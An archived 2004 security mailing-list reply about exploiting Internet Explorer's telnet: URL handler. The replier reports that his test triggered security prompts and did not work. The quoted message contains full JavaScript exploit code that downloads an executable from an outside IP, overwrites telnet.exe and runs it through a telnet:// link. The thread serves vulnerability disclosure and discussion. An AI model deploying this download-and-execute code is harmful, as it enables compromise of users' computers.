Message-ID: <200407210225.i6L2PXqb029710@cairo.anu.edu.au>
From: avalon at cairo.anu.edu.au (Darren Reed)
Subject: telnet URL type used in exploit
Michael,
Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:
"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]
And that was loading it into IE as a *local file*... when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc., and even when I said yes to them it didn't work.
Did you get that popup box when you tested your script below?
Darren
> In reply to the discussion found at:
>
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
>
> the consensus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjunction with other known exploits. Take the following code for
> example:
>
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";
>
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
>
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
>
> payloadURL = downloadurl;
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
>
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
>
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
>
> location.href = "telnet://";
>
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attacker's code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.